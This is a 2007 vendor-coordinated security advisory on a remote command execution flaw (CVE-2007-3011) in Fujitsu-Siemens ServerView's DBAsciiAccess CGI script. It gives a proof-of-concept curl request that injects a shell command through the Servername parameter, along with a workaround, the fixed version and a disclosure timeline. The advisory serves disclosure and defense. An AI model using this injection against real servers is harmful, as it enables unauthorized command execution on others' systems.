Advisory: Fujitsu-Siemens ServerView Remote Command Execution RedTeam Pentesting discovered a remote command execution in the Fujitsu- Siemens ServerView during a penetration test. The DBAsciiAccess CGI script is vulnerable to a remote command execution because of a parameter which is not properly sanitized. An attacker may run arbitrary commands on the server with the permissions of the webserver user. Details ======= Product: Fujitsu Siemens Computers ServerView Affected Versions: < 4.50.09 Fixed Versions: 4.50.09 Vulnerability Type: Remote Command Execution Security-Risk: high Vendor-URL: http://www.fujitsu-siemens.com/products/standard_servers/system_manageme nt/control.html Vendor-Status: informed, fixed version released Advisory-URL: http://www.redteam-pentesting.de/advisories/rt-sa-2007-002.php Advisory-Status: public CVE: CVE-2007-3011 CVE-URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3011 Introduction ============ "ServerView provides asset management tools for automated analysis and version maintenance. It also supports the tracking of system installation and status by collecting inventory data. Because they are stored centrally, archives can be readily compared to a master version to trace changes over time and highlight differences with the original setup." (from the vendor's homepage) More Details ============ ServerView has a Remote Command Execution in its Webinterface. The DBAsciiAccess CGI script provides a "ping" functionality. In the subparameter "Servername" of the parameter "Parameterlist" of this script, the IP address to be pinged is given. This IP address will be given as a parameter to the ping program without further sanitization. By adding a trailing semicolon after the IP, an attacker can add arbitrary shell commands which will be executed with the permissions of the webserver user. Proof of Concept ================ The following URL was wrapped for better readability. curl "http://www.example.com/cgi-bin/ServerView/ SnmpView/DBAsciiAccess ?SSL= &Application=ServerView/SnmpView &Submit=Submit &UserID=1 &Profile= &DBAccess=ASCII &Viewing=-1 &Action=Show &ThisApplication=TestConnectivityFrame &DBElement=ServerName &DBValue=bcmes &DBList=snism &UserValue= &DBTableList=SERVER_LIST &Sorting= &ParameterList=What--primary,, OtherCommunity--public,, SecondIP--,, Timeout--5,, Community--public,, ServerName--bcmes,, Servername--127.0.0.1;id;,, # vulnerable parameter SType--Server" Workaround ========== Block access to the ServerView web interface for all untrusted users. Fix === Version 4.50.09 of the linux agent fixes the problem. It can be downloaded with the SW-ID: 1013988 under http://www.fujitsu-siemens.com/support Fujitsu-Siemens decided to make a silent fix, as the vulnerability is not mentioned in the comments of the patch. They told RedTeam Pentesting that it is fixed in this version, though. Security Risk ============= The security risk is high. An attacker is able to execute arbitrary commands on the server with the permissions of the webserver user. History ======= 2007-05-07 First contact with vendor. No one who is responsible found, contact will call back with further information. 2007-05-08 A responsible contact for the product is found and gets the advisory 2007-05-09 The vulnerability gets acknowledged as not being known before. A fix is being worked on. 2007-06-18 CVE number assigned 2007-07-04 Vendor releases fixed version 2007-07-04 Advisory released RedTeam Pentesting GmbH ======================= RedTeam Pentesting is offering individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at http://www.redteam-pentesting.de. -- RedTeam Pentesting GmbH Tel.: +49 241 963-1300 Dennewartstr. 25-27 Fax : +49 241 963-1304 52068 Aachen http://www.redteam-pentesting.de/ Germany Registergericht: Aachen HRB 14004 Geschftsfhrer: Patrick Hof, Jens Liebchen, Claus R. F. Overbeck -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (GNU/Linux) iQEVAwUARoud89G/HXWsgFSuAQpfFAgAvLtNH2T8vxKuEavcDd7Yh9t3DXrahCje /9HSLdZxz5OlYJP92EsEYq9WKwusZVg7MR8JDb/kfqqABjPaFI36024ij32x8Gz0 1mC+56RPsEXFFAlg4bqtfJPTwEGHSwtFaB+RGFkJNY/YJhLahXwD1svpFXKDg3jG GXbymgISsrCxFs2sHACfzdLfZ7PY10yj5E90EVKDVV5B7uPdE9dhqbgf5/8M3TPy eNleuzhlks6dnKgqNrseJr7+XknIJnO260yPhKiChQGQOF/joWtxEAXhuAYfnXDD gIusNUO6ELWHoxPn5MoZz8T1YJUn749tzl7ljdmnLsljDM5EabVlrw== =hNDL -----END PGP SIGNATURE-----